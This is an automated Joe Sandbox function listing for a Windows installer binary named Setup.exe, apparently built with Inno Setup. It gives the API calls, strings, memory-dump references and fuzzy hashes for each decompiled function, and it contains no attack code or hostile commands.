Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
Opcode Fuzzy Hash: 2d5d1555a5a769ac59b6b27b0feb9421646c1aec55e735ee341e73b68b6ef4a1
Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C

Function 0045453C Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00454758,00454758,00000031,00454758,00000000), ref: 004546E6
CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00454758,00454758,00000031,00454758), ref: 004546F3

Part of subcall function 004544A8: WaitForInputIdle.USER32(00000001,00000032), ref: 004544D4
Part of subcall function 004544A8: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004544F6
Part of subcall function 004544A8: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454505
Part of subcall function 004544A8: CloseHandle.KERNEL32(00000001,00454532,0045452B,?,00000031,00000080,00000000,?,?,0045488B,00000080,0000003C,00000000,004548A1), ref: 00454525

Strings

COMMAND.COM" /C , xrefs: 00454650
cmd.exe" /C ", xrefs: 00454619
.cmd, xrefs: 004545E7
.bat, xrefs: 004545CC
D, xrefs: 00454684

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
API String ID: 854858120-615399546
Opcode ID: c0c5d30634b3838449bcdda523f0df60dcc6a7678c3d770c34d4d793d8b76d64
Instruction ID: 5898c24bda719508e952bf5cb01f3f8a52e5154d5b1a7f0c1159f75b82703416
Opcode Fuzzy Hash: c0c5d30634b3838449bcdda523f0df60dcc6a7678c3d770c34d4d793d8b76d64
Instruction Fuzzy Hash: 67513C30A0034DABDB01EF95C882BDEBBB9AF45309F514437F8047B286D77C5A498759

Function 0041BE73 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
DeleteObject.GDI32(?), ref: 0041BFAF
DeleteObject.GDI32(?), ref: 0041BFB8
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64

Function 0041CEE8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON

Download Yara Rule

APIs

SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
73A24620.GDI32(00000000,00000026), ref: 0041CF2D
73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
73A18830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Stretch$A18830$A122A24620BitsMode
String ID:
API String ID: 430401518-0
Opcode ID: 82a1241456fd04a0e88beeb3c6f30cae89a111749c76fc10312dff3b31cb2f83
Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
Opcode Fuzzy Hash: 82a1241456fd04a0e88beeb3c6f30cae89a111749c76fc10312dff3b31cb2f83
Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58

Function 004565D4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,?,?), ref: 00456626

Part of subcall function 0042428C: GetWindowTextA.USER32(0001041A,?,00000100), ref: 004242AC

Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09

Part of subcall function 004242D4: SetWindowTextA.USER32(0001041A,00000000), ref: 004242EC

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045668D
TranslateMessage.USER32(?), ref: 004566AB
DispatchMessageA.USER32(?), ref: 004566B4

Strings

[Paused] , xrefs: 0045665C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
String ID: [Paused]
API String ID: 3047529653-4230553315
Opcode ID: 46a11ba5551cbee924e7941ad509293be0bffb06fa5ea0530ea92a8540b83dd1
Instruction ID: 5407cbc40fbc40e780d40e1261d4b357eeff69e385f34c28e7b25352baa03612
Opcode Fuzzy Hash: 46a11ba5551cbee924e7941ad509293be0bffb06fa5ea0530ea92a8540b83dd1
Instruction Fuzzy Hash: 1531F970A042449EDB01DBB5DC41BCE7FB8EB0D314F95407BE800E3292D67C9909CBA9

Function 0046A764 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON

Download Yara Rule

APIs

GetCursor.USER32(00000000,0046A8A3), ref: 0046A820
LoadCursorA.USER32(00000000,00007F02), ref: 0046A82E
SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A8A3), ref: 0046A834
Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A8A3), ref: 0046A83E
SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A8A3), ref: 0046A844

Strings

CheckPassword, xrefs: 0046A7C8

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Cursor$LoadSleep
String ID: CheckPassword
API String ID: 4023313301-1302249611
Opcode ID: 417281d9e89520ea889c6b0981a8a06553062cb731d96fd3811c03ec21b92a2b
Instruction ID: 24335674b3d5fb7c894fb49b41c605e8f494223e4efa829e11476080a36dc80c
Opcode Fuzzy Hash: 417281d9e89520ea889c6b0981a8a06553062cb731d96fd3811c03ec21b92a2b
Instruction Fuzzy Hash: 1B31A634640604AFD711EB65C989B9E7BE4EF08304F5580B6F800AB392D778AE41CB4A

Function 00458FA4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045905F

Strings

.NET Framework CreateAssemblyCache function failed, xrefs: 00459082
Fusion.dll, xrefs: 00458FFF
CreateAssemblyCache, xrefs: 00459056
Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045906A
Failed to load .NET Framework DLL "%s", xrefs: 00459044

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc
String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
API String ID: 190572456-3990135632
Opcode ID: 22ab443d198edddbffd76d48bb25cfa9880e9df08f2685b78b4892055926d5ef
Instruction ID: 49fa37d207b3bde44fa74f6dc789ce75dc8756d182da30fc118c482de8ca19ac
Opcode Fuzzy Hash: 22ab443d198edddbffd76d48bb25cfa9880e9df08f2685b78b4892055926d5ef
Instruction Fuzzy Hash: 7931D670E04609EBCB00EFA5C88169EB7B8EF45715F40857BE814E7382DB389E088799

Function 0041C158 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065

GetFocus.USER32 ref: 0041C178
73A1A570.USER32(?), ref: 0041C184
73A18830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
73A122A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
73A18830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
73A1A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A18830$A122A480A570BitsFocusObject
String ID:
API String ID: 2231653193-0
Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28

Function 00418C64 Relevance: 10.6, APIs: 7, Instructions: 67COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000E), ref: 00418C80
GetSystemMetrics.USER32(0000000D), ref: 00418C88
6F5C2980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E

Part of subcall function 004099C0: 6F5BC400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4

6F62CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
6F62C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
6F62CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
6F5C0860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MetricsSystem$C0860C2980C400C740
String ID:
API String ID: 624341609-0
Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759

Function 004821E4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0048229C), ref: 00482281

Strings

ProductType, xrefs: 00482220
LanmanNT, xrefs: 0048224B
System\CurrentControlSet\Control\ProductOptions, xrefs: 00482208
WinNT, xrefs: 00482231
ServerNT, xrefs: 00482265

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseOpen
String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
API String ID: 47109696-2530820420
Opcode ID: e3d231deedddf997fd92777d7235c7882c02f42ee6b21b0e6657f2943b9d01aa
Instruction ID: 87bf858376d3207450481095c65966a94705260f4f78797035e592602c621e2d
Opcode Fuzzy Hash: e3d231deedddf997fd92777d7235c7882c02f42ee6b21b0e6657f2943b9d01aa
Instruction Fuzzy Hash: 0911B230A04204AEDB10F7B6CE02B5F7BA8DB41354F1088B7A801E7692DBBCDD45875C

Function 0041B472 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32(00000000,?), ref: 0041B480
SelectObject.GDI32(?,00000000), ref: 0041B48F
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
SelectObject.GDI32(?,00000000), ref: 0041B4D7
DeleteDC.GDI32(00000000), ref: 0041B4E0
DeleteDC.GDI32(?), ref: 0041B4E9

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ObjectSelect$Delete$Stretch
String ID:
API String ID: 1458357782-0
Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54

Function 00493B6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,?,?,00000000), ref: 00493B7D

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(00000000,00000000), ref: 00493B9F
GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,0049411D), ref: 00493BB3
GetTextMetricsA.GDI32(00000000,?), ref: 00493BD5
73A1A480.USER32(00000000,00000000,00493BFF,00493BF8,?,00000000,?,?,00000000), ref: 00493BF2

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00493BAA

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 1435929781-222967699
Opcode ID: 50f57fb69113b7d2d502807a16d2e654426cf5b09d74d84ab9d1dc1b998f164d
Instruction ID: 1fbb7d20c9a9065d84e9e10db6abc602dd2856f8c598f1399c904acfceb0a9fe
Opcode Fuzzy Hash: 50f57fb69113b7d2d502807a16d2e654426cf5b09d74d84ab9d1dc1b998f164d
Instruction Fuzzy Hash: BE018876644604BFDB00EFA9CC42F5EB7ECDB49705F514476B604E7281D678AE008B24

Function 004233A4 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 004233BF
WindowFromPoint.USER32(?,?), ref: 004233CC
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
GetCurrentThreadId.KERNEL32 ref: 004233E1
SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
SetCursor.USER32(00000000), ref: 00423423

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD

Function 00493990 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll), ref: 004939A0
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004939AD
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004939BA

Strings

MonitorFromRect, xrefs: 004939A7
GetMonitorInfoA, xrefs: 004939B4
user32.dll, xrefs: 0049399B

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
API String ID: 667068680-2254406584
Opcode ID: a8a02e212b4184edfe33d04a28a25f4a990e9b6c157f5eebe97688fbde536947
Instruction ID: a38205dd91106e4269d8d35c6bdf9212f34e9fda4a7f8cb7c0a7e7a7608b7ce0
Opcode Fuzzy Hash: a8a02e212b4184edfe33d04a28a25f4a990e9b6c157f5eebe97688fbde536947
Instruction Fuzzy Hash: CAF0C292B4175467DE2069A60C82F7B6D8CCB83762F040137BD44A6282E9AD8E0542AD

Function 0045C9A8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,ISCryptGetVersion), ref: 0045C9B1
GetProcAddress.KERNEL32(?,ArcFourInit), ref: 0045C9C1
GetProcAddress.KERNEL32(?,ArcFourCrypt), ref: 0045C9D1

Strings

ArcFourCrypt, xrefs: 0045C9CB
ArcFourInit, xrefs: 0045C9BB
ISCryptGetVersion, xrefs: 0045C9AB

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc
String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
API String ID: 190572456-508647305
Opcode ID: c33d32a445c5e60b218ea3e09ead34d5ad172bb83c2af83e24cd96cb5b26811b
Instruction ID: 1e0c9fbe178db71278be9471bcd137ab4b3e79b548452a08d7c95af7a8586b22
Opcode Fuzzy Hash: c33d32a445c5e60b218ea3e09ead34d5ad172bb83c2af83e24cd96cb5b26811b
Instruction Fuzzy Hash: B6F049B0A00300CED714DF36BEC633B7A95E768311F18C03BA515A51A2E738084CCA5C

Function 0045CEA8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,BZ2_bzDecompressInit), ref: 0045CEB1
GetProcAddress.KERNEL32(?,BZ2_bzDecompress), ref: 0045CEC1
GetProcAddress.KERNEL32(?,BZ2_bzDecompressEnd), ref: 0045CED1

Strings

BZ2_bzDecompress, xrefs: 0045CEBB
BZ2_bzDecompressInit, xrefs: 0045CEAB
BZ2_bzDecompressEnd, xrefs: 0045CECB

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc
String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
API String ID: 190572456-212574377
Opcode ID: 32952d06837430f9e8757048dbe5237d39f5d4d005c39c8a5b2dd744f6b681fd
Instruction ID: 455f1597211012eadddf85cdc87209e4d4cec46549f5a6c4a532c2ec0858ec3d
Opcode Fuzzy Hash: 32952d06837430f9e8757048dbe5237d39f5d4d005c39c8a5b2dd744f6b681fd
Instruction Fuzzy Hash: 04F0A4B1500700DEEB24DB26BEC67272697E7A4746F24843BD819A62A3F77C0449CA9C

Function 0047783C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,004972E7), ref: 00477842
GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047784F
GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047785F

Strings

VerifyVersionInfoW, xrefs: 00477859
VerSetConditionMask, xrefs: 00477849
kernel32.dll, xrefs: 0047783D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
API String ID: 667068680-222143506
Opcode ID: 640796b35c0a1ce75f6c4b4bb4fc8d3f53e1284a214d4f024413820b30621cc0
